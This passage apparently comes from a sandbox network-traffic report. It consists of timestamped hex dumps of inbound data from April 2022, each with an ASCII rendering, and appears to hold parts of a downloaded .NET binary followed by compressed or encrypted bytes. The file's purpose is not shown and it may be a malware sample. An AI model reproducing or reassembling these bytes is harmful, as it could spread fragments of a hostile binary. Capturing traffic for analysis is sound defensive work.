                                                  2022-04-23 06:14:59 UTC772INData Raw: 2f 00 30 00 24 00 27 00 24 00 26 00 24 00 25 00 20 00 24 00 20 00 23 00 20 00 22 00 20 00 21 00 19 00 1f 00 19 00 1e 00 19 00 1d 00 19 00 1c 00 19 00 1b 00 19 00 1a 00 16 00 17 00 15 00 16 00 0e 00 0f 00 04 00 07 00 04 00 06 00 04 00 05 00 02 00 03 00 00 00 eb 00 00 00 02 00 05 08 04 00 00 00 ca 00 00 00 02 00 00 00 00 00 00 00 00 00 67 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 5b 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 49 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 3c 00 13 00 00 00 00 00 00 00 00 00 04 00 02 00 00 00 00 00 35 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 26 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 1d 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 01 00 00 00 00
                                                  Data Ascii: /0$'$&$% $ # " !g[I<5&
                                                  2022-04-23 06:14:59 UTC773INData Raw: 08 27 08 22 08 1e 00 1f 00 00 00 00 00 01 00 1d 00 00 00 00 00 01 00 07 00 00 00 63 00 01 00 06 00 00 00 0d 00 01 00 05 00 00 00 0c 00 01 02 10 00 c5 02 10 00 c1 01 e6 00 bf 01 e6 00 b7 01 e6 00 af 01 f0 00 a5 01 f0 00 a1 01 e6 00 9d 01 e3 00 99 05 fe 00 64 05 ee 00 1b 14 41 05 ee 00 1b 14 21 05 ee 00 1b 12 81 05 ee 00 1b 12 61 05 ee 00 1b 12 41 05 ee 00 1b 12 21 05 ee 00 1b 12 01 05 ee 00 1b 11 e1 05 ee 00 1b 11 c1 05 ee 00 1b 11 a1 05 ee 00 1b 11 81 05 ee 00 1b 11 61 05 ee 00 1b 11 41 05 ee 00 1b 11 21 05 ee 00 1b 11 01 05 ee 00 1b 10 e1 05 ee 00 1b 10 c1 05 ee 00 1b 10 a1 05 ee 00 1b 10 81 05 ee 00 1b 10 61 05 ee 00 1b 10 41 05 ee 00 1b 10 21 05 ee 00 1b 10 01 00 5c 00 23 0f c0 00 5c 00 23 0f a0 05 ee 00 1b 0f 81 00 5c 00 23 0f 80 05 ee 00 1b 0f 61 00
                                                  Data Ascii: '"cdA!aA!aA!aA!\#\#\#a
                                                  2022-04-23 06:14:59 UTC775INData Raw: 54 04 5a 15 44 04 29 0d ad 12 50 02 81 08 45 15 38 04 41 0d a7 0d 88 04 29 01 76 12 50 04 59 0d a0 13 bc 04 59 09 3c 15 25 03 01 08 87 10 8c 00 54 00 28 0d 88 00 54 00 70 0c 20 00 09 0c f4 15 20 03 b9 00 23 0d 88 01 01 01 8f 15 0e 03 b9 0a 5c 11 8c 02 91 0c e5 14 fe 03 a1 02 e1 14 ec 02 69 00 28 0d 88 02 f9 0c c5 14 dc 01 49 09 42 14 d3 04 29 01 76 14 cb 04 29 01 76 14 bc 01 49 02 c8 0e 0d 00 f1 0c c9 14 b0 01 41 0c c5 14 a5 01 41 0c bf 14 93 01 41 0c a7 14 86 02 e1 0c a1 11 6b 04 29 01 76 10 83 02 59 01 76 12 50 01 11 0c 9b 14 76 01 11 0c 95 14 6e 01 11 02 e1 14 61 01 a1 07 a5 10 b0 00 f9 00 28 0d 88 00 f9 00 28 0d 88 02 e1 0c 8e 14 4c 02 d9 0c 75 13 b2 04 29 0c 70 14 44 04 29 04 a2 14 40 02 c1 00 a8 0d 88 04 99 0c 5e 14 39 04 29 0c 5a 14 28 04 91 0c 54
                                                  Data Ascii: TZD)PE8A)vPYY<%T(Tp #\i(IB)v)vIAAAk)vYvPvna((Lu)pD)@^9)Z(T
                                                  2022-04-23 06:14:59 UTC776INData Raw: 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00
                                                  Data Ascii: pln)' ln)' ' n)' ' ' )' pln)'
                                                  2022-04-23 06:14:59 UTC777INData Raw: 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c a1 00 0c 00 00 0c c9 00 0b 00 00 0c 77 00 0a 00 00 0c 49 00 09 00 00 0c 22 00 08 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00
                                                  Data Ascii: )' ' ' n)' ' ' ' pln)' ln)' ' )' wI"p
                                                  2022-04-23 06:14:59 UTC779INData Raw: 0e 32 00 91 00 00 00 00 85 00 01 c9 00 1c 0e 2a 00 96 00 00 00 00 83 74 01 c8 05 e7 0c 20 00 91 00 00 00 00 83 58 01 c8 04 64 0c 20 00 93 00 00 00 00 83 50 01 c7 05 e0 0c 20 00 91 00 00 00 00 83 34 01 c7 05 da 0c 20 00 93 00 00 00 00 83 2c 01 c6 05 ce 0c 20 00 93 00 00 00 00 82 dc 01 c5 05 c7 0c 20 00 93 00 00 00 00 82 90 01 c5 00 1c 0c 20 00 93 00 00 00 00 82 10 01 c5 00 1c 0c 20 00 93 00 00 00 00 81 a0 01 c5 00 1c 0c 20 00 93 00 00 00 00 80 c8 01 c5 02 57 0c 20 00 93 00 00 00 00 7f f4 01 c4 02 5b 0c 20 00 93 00 00 00 00 7f 64 01 c4 00 28 0d 88 18 86 00 00 00 00 7f 44 01 c4 05 c2 0c 20 00 93 00 00 00 00 7f 04 01 c3 05 bb 0c 20 00 93 00 00 00 00 7e e8 01 c3 05 b5 0c 20 00 93 00 00 00 00 7e cc 01 c3 05 af 0c 20 00 93 00 00 00 00 7e 70 01 c3 00 28 0d 88 18
                                                  Data Ascii: 2*t Xd P 4 , W [ d(D ~ ~ ~p(
                                                  2022-04-23 06:14:59 UTC780INData Raw: 36 04 b6 0c 20 00 83 00 00 00 00 74 18 01 35 00 a8 0c 29 00 83 00 00 00 00 73 f8 01 35 01 76 0c 29 00 83 00 00 00 00 73 d8 01 34 01 71 0c 20 00 83 00 00 00 00 73 b8 01 34 00 2c 0c 20 00 83 00 00 00 00 73 98 01 33 00 a8 0c 27 00 83 00 00 00 00 73 78 01 33 01 76 0c 27 00 83 00 00 00 00 73 58 01 32 00 a8 0c 20 00 83 00 00 00 00 73 38 01 32 01 76 0c 20 00 83 00 00 00 00 73 18 01 31 00 23 0c 20 00 83 00 00 00 00 72 f8 01 31 00 30 0c 20 00 83 00 00 00 00 72 d8 01 31 00 28 0d 88 18 86 00 00 00 00 72 b8 01 31 00 1c 0c 20 00 93 00 00 00 00 72 3c 01 31 00 1c 0c 20 00 93 00 00 00 00 71 44 01 31 02 57 0c 20 00 93 00 00 00 00 70 4c 01 31 00 1c 0c 20 00 93 00 00 00 00 6e d0 01 31 00 28 0d 9d 05 c6 00 00 00 00 00 00 01 31 00 34 0d 9d 05 c6 00 00 00 00 00 00 01 31 00 2c
                                                  Data Ascii: 6 t5)s5v)s4q s4, s3'sx3v'sX2 s82v s1# r10 r1(r1 r<1 qD1W pL1 n1(141,
                                                  2022-04-23 06:14:59 UTC781INData Raw: 00 00 00 df 03 b1 0d d2 01 c6 00 03 00 00 00 00 00 dd 01 51 0d 88 18 86 00 03 00 00 00 00 00 dc 01 66 0d e5 01 c6 00 03 00 00 00 00 00 d8 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 d6 03 44 0d d2 01 c6 00 03 00 00 00 00 00 d4 01 51 0d 88 18 86 00 03 00 00 00 00 00 d2 03 a8 0d e5 01 c6 00 03 00 00 00 00 00 cb 03 98 0d d9 01 c6 00 03 00 00 00 00 00 c6 03 8d 0d d2 01 c6 00 03 00 00 00 00 00 c4 01 51 0d 88 18 86 00 03 00 00 00 00 00 c1 03 80 0d e5 01 c6 00 03 00 00 00 00 00 b5 03 69 0d d9 01 c6 00 03 00 00 00 00 00 ab 03 57 0d d2 01 c6 00 03 00 00 00 00 00 a9 01 51 0d 88 18 86 00 03 00 00 00 00 00 a8 01 66 0d e5 01 c6 00 03 00 00 00 00 00 a4 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 a2 03 44 0d d2 01 c6 00 03 00 00 00 00 00 a0 01 51 0d 88 18 86 00 03 00 00 00 00 00
                                                  Data Ascii: QfKDQQiWQfKDQ
                                                  2022-04-23 06:14:59 UTC783INData Raw: 80 00 00 00 00 00 3b 01 a6 0c 20 20 93 00 80 00 00 00 00 00 37 01 9e 0c 20 20 93 00 80 00 00 00 00 00 32 01 93 0c 20 20 93 00 80 00 00 00 00 00 32 01 8f 0c 20 20 93 00 80 00 00 00 00 00 31 01 89 0c 20 20 93 00 80 00 00 00 00 00 30 01 71 0c 29 00 83 00 00 00 00 3c f4 00 30 00 2c 0c 29 00 83 00 00 00 00 3c d4 00 2f 01 7f 0c 20 00 83 00 00 00 00 3c b4 00 2f 01 7a 0c 20 00 83 00 00 00 00 3c 94 00 2e 00 a8 0c 20 00 83 00 00 00 00 3c 74 00 2e 01 76 0c 20 00 83 00 00 00 00 3c 54 00 2d 01 71 0c 27 00 83 00 00 00 00 3c 34 00 2d 00 2c 0c 27 00 83 00 00 00 00 3c 14 00 2c 01 71 0c 20 00 83 00 00 00 00 3b f4 00 2c 00 2c 0c 20 00 83 00 00 00 00 3b d4 00 2c 00 28 0d 88 18 86 00 00 00 00 3b b4 00 2b 01 66 0d e5 01 c6 00 03 00 00 00 00 00 28 01 5c 0d d9 01 c6 00 03 00 00
                                                  Data Ascii: ; 7 2 2 1 0q)<0,)</ </z <. <t.v <T-q'<4-,'<,q ;,, ;,(;+f(\
                                                  2022-04-23 06:14:59 UTC784INData Raw: 0c 29 00 01 00 9d 0c 27 00 01 01 11 0c 20 00 01 02 dc 0c 20 00 11 02 d7 0c 6e 80 56 02 d7 0c 29 80 56 02 d7 0c 27 80 56 02 d7 0c 20 80 56 00 20 0d bb 06 06 00 20 0c 22 00 01 00 9d 0c 9a 00 01 02 b4 0c 70 00 01 00 9d 0c 6c 00 06 00 9d 0c 6e 00 01 00 20 0c 29 00 01 02 af 0c 27 00 01 00 20 0c 20 00 01 02 aa 0c 27 00 01 00 9d 0c 20 00 21 00 9d 0c a1 00 01 00 9d 0c c9 00 06 00 89 0c 77 00 06 00 89 0c 49 00 06 00 89 0c 22 00 06 00 89 0c 9a 00 06 00 89 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 9d 0c 27 00 01 00 9d 0c 20 00 06 00 20 0c 29 00 01 00 20 0c 27 00 01 01 6d 0c 20 00 01 02 73 0c 20 00 33 00 89 0c 9a 00 06 00 9d 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 89 0c 27 00 06 02 69 0c 20 00 06 02 51 0c 49 00
                                                  Data Ascii: )' nV)V'V V "pln )' ' !wI"pln)' ) 'm s 3pln)'i QI
                                                  2022-04-23 06:14:59 UTC785INData Raw: 00 01 80 00 b6 00 6c 01 65 00 00 0c 9a 00 00 01 05 00 b2 00 6c 01 65 00 00 0c 70 00 00 01 05 00 ae 00 6c 01 65 00 00 0c 6e 00 00 01 05 00 aa 00 6c 01 65 00 00 0c 6c 00 00 01 05 00 a6 00 6c 01 65 00 00 0c 77 00 00 01 05 00 a2 00 6c 01 65 00 00 0c 29 00 00 01 05 00 9e 00 6c 01 65 00 00 0c 49 00 00 01 05 00 9a 00 6c 01 65 00 00 0c 27 00 00 01 05 00 96 00 6c 01 65 00 00 0c 22 00 00 01 05 00 92 00 6c 01 65 00 00 0c 20 00 00 01 05 00 91 00 62 01 79 00 00 0c 95 00 10 01 80 00 88 00 5e 00 30 00 00 0c 90 00 10 01 00 00 84 00 5e 01 79 00 00 0c 8b 00 10 01 80 00 82 00 5d 01 79 00 00 0c 86 00 10 01 80 00 82 00 58 00 cd 00 00 0c 81 00 00 01 00 00 81 00 58 01 79 00 00 0c 7c 00 10 01 80 00 80 00 58 01 79 00 00 0c 77 00 10 01 80 00 7f 00 58 00 00 00 00 0c 29 00 00 00 a0
                                                  Data Ascii: leleplenlellewle)leIle'le"le by^0^y]yXXy|XywX)
                                                  2022-04-23 06:14:59 UTC787INData Raw: 00 06 05 33 05 94 00 06 05 33 05 86 00 06 05 33 05 7c 00 06 05 4d 05 71 00 0e 05 4d 05 63 00 0e 05 4d 05 3d 00 0e 05 33 05 24 00 06 00 35 05 18 00 06 00 35 05 0b 00 06 04 f6 04 ea 00 06 00 35 04 e7 00 06 00 35 04 dd 00 06 00 00 04 cf 00 d3 00 35 04 c3 00 06 00 35 04 be 00 06 00 26 04 b9 00 0a 00 26 04 af 00 0a 00 35 04 a8 00 06 03 d7 04 9e 00 0e 03 d7 04 93 00 06 03 d7 04 88 00 06 03 d7 04 75 00 0e 03 d7 04 64 00 0e 03 d7 04 4c 00 0e 03 d7 04 3e 00 0e 03 d7 04 36 00 0e 03 d7 04 19 00 06 03 d7 04 01 00 06 03 d7 03 ea 00 06 03 d7 03 bc 00 06 00 35 03 b3 00 06 00 35 03 aa 00 06 00 35 03 a2 00 06 03 8c 03 7d 00 0e 03 5e 03 4a 00 0e 03 14 03 33 00 06 03 14 03 27 00 06 03 14 03 08 00 06 02 b6 03 01 00 06 02 b6 02 ed 00 06 02 b6 02 df 00 06 02 b6 02 d1 00 06 02
                                                  Data Ascii: 333|MqMcM=3$555555&&5udL>6555}^J3'
                                                  2022-04-23 06:14:59 UTC788INData Raw: 9a ac c5 0f 1d 85 2a 5d 6d a9 93 55 f2 30 c8 15 29 db 13 07 85 2a 5d 71 68 2a 36 07 15 53 7b 6e 85 d8 cc 85 2a 52 80 95 6c db 40 a8 9f 70 fa d5 ad 6d dc 6f 93 0d 79 04 3f b1 4a 74 65 de af 18 13 60 5e af f1 e4 33 ca af 4d 52 bf f0 69 e6 80 ae ac 41 34 7d 85 2a 52 9a 33 d0 90 44 8e 85 2a 52 c1 bd 69 59 14 85 2a 52 ca 48 8f 83 df d2 d1 f9 65 32 85 86 c5 df 4d 59 76 bb 78 93 fb 9e 28 09 36 95 10 05 20 7b 85 2a 52 f6 8b 05 ff d3 c3 5d 33 11 51 59 c3 5c 15 ac b3 50 16 4a ce 01 0d 85 2a 52 17 eb cf e0 30 0e 97 98 c4 ea 98 b7 09 44 cc fb e2 88 3c f4 20 6a c0 1a c5 0a 85 2a 52 34 5a 6b 71 8e a2 dd 19 a2 df f4 7e bf 4c 39 bb 63 42 38 34 88 12 b0 4f e5 1d 21 e8 9f 90 00 b9 4c a6 85 2a 52 59 67 fb 12 2d bd 3b cb e1 85 2a 52 56 b4 fb f2 21 61 aa 59 9d aa 81 0b ee 30
                                                  Data Ascii: *]mU0)*]qh*6S{n*Rl@pmoy?Jte`^3MRiA4}*R3D*RiY*RHe2MYvx(6 {*R]3QY\PJ*R0D< j*R4Zkq~L9cB84O!L*RYg-;*RV!aY0
                                                  2022-04-23 06:14:59 UTC789INData Raw: 57 a4 0e a6 4d b8 85 2a 57 c5 7a 63 3d 50 fe 8d 1d 90 49 ef 4c cc 41 ef 3f 85 2a 57 db 6b 8d 97 bd 29 83 f9 51 bb 51 85 2a 57 e2 e7 64 c1 b4 81 22 a4 ab a9 13 49 6e de 00 14 16 1d c2 10 15 c4 0d d3 f0 e0 04 6c e1 ee 5f 02 85 2a 57 14 f4 fb dc c6 90 b9 cd 42 da 58 ec 1b a8 a2 64 a5 15 2f ef f2 0f dc d0 60 2a 1d 80 85 2a 57 3f 57 66 f9 dc ba b7 f8 d6 dd 3e 39 85 2a 57 3e 65 32 50 91 fd 21 14 85 2a 57 45 a4 a9 cb 51 ee bc 61 85 2a 57 48 c9 cf 74 5b 70 c1 98 bf aa 3d 70 1e ef 31 85 2a 57 55 26 99 9a 4a 63 85 2a 57 65 a0 f9 dd ad 1f 0d 84 d0 2c 85 2a 57 72 e4 93 35 fd 4b 16 6a 59 11 b5 1a fd e1 a9 ec e8 b9 c6 11 38 a0 68 92 42 85 2a 54 85 f3 6d 6b 0f b3 49 4a 8b 8c e0 31 a9 bc 5c dc ba 57 69 20 8f 8c 00 df 7e 26 70 c7 7a 85 47 66 85 2a 54 af 57 d5 32 05 f0 70
                                                  Data Ascii: WM*Wzc=PILA?*Wk)QQ*Wd"Inl_*WBXd/`**W?Wf>9*W>e2P!*WEQa*WHt[p=p1*WU&Jc*We,*Wr5KjY8hB*TmkIJ1\Wi ~&pzGf*TW2p
                                                  2022-04-23 06:14:59 UTC790INData Raw: 38 dc 48 38 98 7c e8 dc 7c 98 0c 48 e8 0c 98 98 38 dc 48 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd 15 b5 51 c5 f1 51 b5 21 65 c5 21 b5 b5 15 f1 65 15 b5 51 c5 f1 51 86 c1 65 c5 21 b9 b5 10 d1 65 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 66 82 16 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 26 a2 16 3c 46 5d c9 fd 5d b9 41 05 ad 03 dc dc 6b 92 0a 6a d4 5d a7 94 3c f4 41 05 8d 5f d6 fa 46 fd 69 ea 4a ae 3a 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a ea 4f 8d fa 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a 8c 2c c8 5c 68 c8 2c b8 fc 5c 98 2c
                                                  Data Ascii: 8H8||H8HwCwCwCwC__/k/k__/k/k}I}I}I}IQQ!e!eQQe!ef""RRff""RR&<F]]Akj]<A_FiJ:J:JJOJ:JJ,\h,\,
                                                  2022-04-23 06:14:59 UTC792INData Raw: 3b 72 8a a0 71 06 b6 7b 39 59 c2 fe 65 f9 4a fd 9d e1 c6 f5 e1 a1 37 52 b1 37 df 7f e2 65 b7 59 35 7c b0 39 a5 74 1e c6 07 80 23 41 d9 02 6f f9 2e 50 6f 0c 03 32 5d 8f d1 62 1f be 39 2a 50 53 2d 41 e0 35 81 9b cd 10 19 eb f9 0d 63 03 e0 07 6f 26 c8 c1 d6 e0 b6 70 3b 68 47 4a a7 eb 91 f8 f1 31 4f a1 ab 01 b7 25 d0 ec cb cb a7 b9 9b 91 b5 2d 80 96 5a 13 d8 1e 5d 6d 96 44 e8 5c 48 39 56 fb 91 26 5c 2b 46 2c 85 9c 59 a8 6c b6 68 22 79 fb 55 7c c8 44 b1 71 c7 47 15 3e 8e 98 f4 bd e1 b5 9c f9 51 a4 4a c9 f5 7a 8a 9f 78 99 be 19 fd bc e2 27 a6 ef 78 15 63 fd 50 b9 34 c5 e5 99 3c 2f 81 4a 26 9d 4b 3f 3d ca 7d fa e8 d0 4b 51 53 a6 5f 8b 70 51 8f 34 bd 3b d3 56 3f bd 76 78 d1 32 e3 14 aa ec 05 66 7a 89 7c aa 4a 79 73 e1 d1 f6 1e 62 30 a1 90 1e b8 d3 f2 6d 13 ed 2f
                                                  Data Ascii: ;rq{9YeJ7R7eY5|9t#Ao.Po2]b9*PS-A5co&p;hGJ1O%-Z]mD\H9V&\+F,Ylh"yU|DqG>QJzx'xcP4</J&K?=}KQS_pQ4;V?vx2fz|Jysb0m/
                                                  2022-04-23 06:14:59 UTC793INData Raw: e8 29 11 a1 6d 07 61 77 cc 0d 29 80 6b 0e b6 e8 5b 48 5f a0 72 fd c9 36 9a a4 2a 96 57 85 c2 a2 79 a5 f1 6d 4a 40 6e 92 fd 98 1d 88 b3 cc b9 64 51 37 44 18 21 fa 64 d2 4d 2e 09 0b 05 97 2c f0 e7 ae 38 7a ff ed 3b f2 35 e2 c5 9f 11 fb 72 66 14 cc 4d 16 44 82 76 68 52 5e 23 f0 72 01 90 c3 60 24 36 cb c7 e2 27 41 58 3b 41 28 83 e0 47 b6 d7 46 a1 1d 72 c1 6d 4d 8d 0c df 95 03 78 63 cc 93 56 e1 b2 20 65 dd 50 42 58 3f 0d a2 89 b9 d0 fa 42 e2 64 50 98 94 9b a4 cd 8c f0 9a 49 05 f3 0a e8 3d 85 21 46 42 d5 da ae b3 8b ed 1c bf 13 63 99 1f b7 c4 2b 19 b4 b6 98 70 3d 44 34 76 68 00 b3 c0 11 9a 18 1c 72 b7 fc 71 58 da 68 49 ec 62 aa a9 72 2b 08 3b d1 5b 8f 91 5b 51 78 76 bf fb bc ee 77 1e 82 15 dd 9d 6e 5e 40 fc 40 c3 93 17 d6 c9 dd 7a 38 da 8f 6b 7f 11 be c1 a6 76
                                                  Data Ascii: )maw)k[H_r6*WymJ@ndQ7D!dM.,8z;5rfMDvhR^#r`$6'AX;A(GFrmMxcV ePBX?BdPI=!FBc+p=D4vhrqXhIbr+;[[Qxvwn^@@z8kv
                                                  2022-04-23 06:14:59 UTC794INData Raw: c2 d5 af 03 e3 7f c3 a8 68 64 b4 19 4d 2d 53 96 35 24 8f 66 0a a3 27 8d de 0f 96 0f 73 74 71 ee 03 af e0 74 cb b4 b6 c6 d5 a6 6b d3 13 c0 04 01 4d fb a8 9b 0b cd 20 b8 c6 f2 b2 a2 13 ca 7f df d2 32 bd 90 7d 65 28 1b a2 05 09 ad f1 69 b4 ba 69 2f 74 b0 a8 30 37 7d 6d eb be d3 f6 0e 6f 84 9f c8 04 61 b2 0a 84 3d 73 f1 c0 79 d8 50 6b 36 19 bc 68 af 7f 99 1f 8a 74 97 e1 35 45 cd 5e 2e 7b be fb 2c 38 c3 a0 be 55 de 10 ca 9b 8b 65 40 24 03 cd bc 8f 52 5d b1 40 e0 87 bf a8 b7 d1 80 aa 75 94 99 07 c4 8a e1 e8 f4 9b a0 f7 96 b7 a9 c5 cc bd c7 6a 8d cd cf 7b 9b fa f4 f6 ed cd b7 b1 fa 31 f1 94 90 d7 03 38 e7 23 d5 25 54 1b 68 16 b6 0a ee 61 61 e1 1e 58 8c fd 30 1d 59 46 4a fd 48 49 2b 9e f2 71 41 71 b8 20 4c 92 c0 44 31 55 e9 f9 bc ea 5b 8a be 5d 30 ac 26 d1 fc 53
                                                  Data Ascii: hdM-S5$f'stqtkM 2}e(ii/t07}moa=syPk6ht5E^.{,8Ue@$R]@uj{18#%ThaaX0YFJHI+qAq LD1U[]0&S
                                                  2022-04-23 06:14:59 UTC796INData Raw: 8a 12 25 9d 33 61 5d 14 c7 46 ca aa 38 a2 0c d7 bb f1 e2 dc 3a 70 d6 15 fd a8 0c e4 77 bf 00 0b 66 ac 26 75 50 6a 19 e6 02 51 fb 16 bc 6a 2e be f6 95 98 97 3a 37 68 fb 47 d8 1d 96 f6 7a 62 f5 2e 49 6c 05 27 10 46 c4 cd 07 07 63 cf db a1 0a 46 9e 4f be 87 e8 f2 e5 eb d9 73 7b d1 df 1d 39 f7 28 21 af 15 84 40 fd ec 9c 8c bc bc 52 e9 4e 10 93 d5 39 a1 f4 ba f9 03 24 21 e5 66 0a 46 35 f2 0a 17 24 94 d6 7b 0a 0b 65 b2 44 44 81 d7 46 19 d2 0a 6c be 8a cf 4c 89 be fb a7 ef 7a 22 90 ec 0f 8b d1 57 14 d4 e0 96 5e 4e 58 0e 9b 12 91 ac 49 c5 55 4a 1c 63 13 7a a2 ee 38 4b 87 18 f7 2a d5 53 0a 22 b7 03 7b a5 eb c7 61 8d 87 60 84 1a ff 72 66 d2 54 f4 c0 db 88 ad 42 1e b5 1d 3d e4 60 3b 77 51 b7 db 5f ec 7b 9d 55 f7 80 88 eb 6f c6 1d 31 d9 61 b7 00 5d a6 51 90 8a 71 f9
                                                  Data Ascii: %3a]F8:pwf&uPjQj.:7hGzb.Il'FcFOs{9(!@RN9$!fF5${eDDFlLz"W^NXIUJcz8K*S"{a`rfTB=`;wQ_{Uo1a]Qq
                                                  2022-04-23 06:14:59 UTC797INData Raw: c8 41 14 15 bc 6c 5b 8e 6b 86 df 1e da e5 de 0f 00 f7 0a ed 54 2f 83 5d 2f fd a9 1b 82 70 99 3e 60 7b 07 29 bf 04 dd c0 66 c6 3d bc 13 f3 20 1d 9c 24 99 c1 7e 9c 5e 0b f5 3f e4 23 a3 72 83 e8 56 43 79 88 6e da 0e 7a 20 b4 d6 4b 5d e7 ca 6d 41 97 67 04 36 d7 31 1f 2f 9a 84 e8 9a 48 03 a7 f8 ae 5a 09 7b 26 3c 30 50 cf 25 27 b0 e5 1a 83 a8 3f 00 6b 09 7f 5a 89 22 f5 2c 32 ee 8b 4a 6c 54 55 03 3f 25 6b f7 2d b8 b3 48 ac 78 0f 59 2b 38 47 3c 9f f4 0d 50 77 eb 95 a8 f4 1c 59 50 a0 83 8b fe 91 7b 2b 90 a2 66 47 02 b1 d8 fc 2f 50 c9 36 2f 6b f1 e7 f4 e0 04 46 ca e3 ab 26 9b be 87 49 c9 a9 f1 5d 15 b4 65 ef 89 07 e3 d9 20 87 46 bc c3 4a 74 70 84 36 65 cb d6 0f 2d 39 ae e3 46 6f 50 0f 6c de 00 ef b8 2e cd cb 5a c8 6a 42 f0 68 e0 47 58 be 39 15 e1 01 bb 19 68 fa d6
                                                  Data Ascii: Al[kT/]/p>`{)f= $~^?#rVCynz K]mAg61/HZ{&<0P%'?kZ",2JlTU?%k-HxY+8G<PwYP{+fG/P6/kF&I]e FJtp6e-9FoPl.ZjBhGX9h
                                                  2022-04-23 06:14:59 UTC798INData Raw: 7c 16 e5 b9 7b 5a 68 81 f8 38 d3 1d 7a 1f 04 53 67 fa bb a0 73 cb de 85 8c e7 cd db 38 ef a5 47 0f ae 0a 41 72 84 17 6b d9 c0 f9 2b 0b 7b 6f 8c 8f 82 fb 84 a8 ce 57 63 f9 64 b5 9d 6b e0 f6 34 98 4b e7 8a aa 32 d6 ea 8d 19 d2 25 5b 1a 7d 7e d4 51 1c 4b 76 a5 cd 16 f2 98 f7 c1 a5 5e 0e 54 de 4f e9 bd cb 44 1a 0d 52 35 7d 0c d4 38 d2 11 d8 6f 46 8d 2c 87 91 b6 b7 a0 80 8b 9a 54 53 ff 42 0f 5e 17 1c 97 99 81 e5 8c c2 77 fb 1e 05 86 c0 c3 40 fd d7 66 ba 8b b5 e6 06 ce 4f 68 7f a2 42 85 6f 55 ec 25 ae 9e 13 a5 fc 0a e2 a6 dc d1 9b d6 da 1d 74 47 27 33 9b b9 b8 f7 1b 69 e7 7c ca 21 37 68 f1 5c b3 47 5f 32 7d 8f 5c 2c c2 aa 03 a6 9e 4e 4b ed 75 00 fd 35 1b ec 9e 19 18 a9 7e 4a 96 17 b8 4c 4a df 20 6c 96 c0 83 73 c8 1f 9d 97 6c a2 5d 21 bd 8c 77 25 44 e9 ee 86 b5
                                                  Data Ascii: |{Zh8zSgs8GArk+{oWcdk4K2%[}~QKv^TODR5}8oF,TSB^w@fOhBoU%tG'3i|!7h\G_2}\,NKu5~JLJ lsl]!w%D
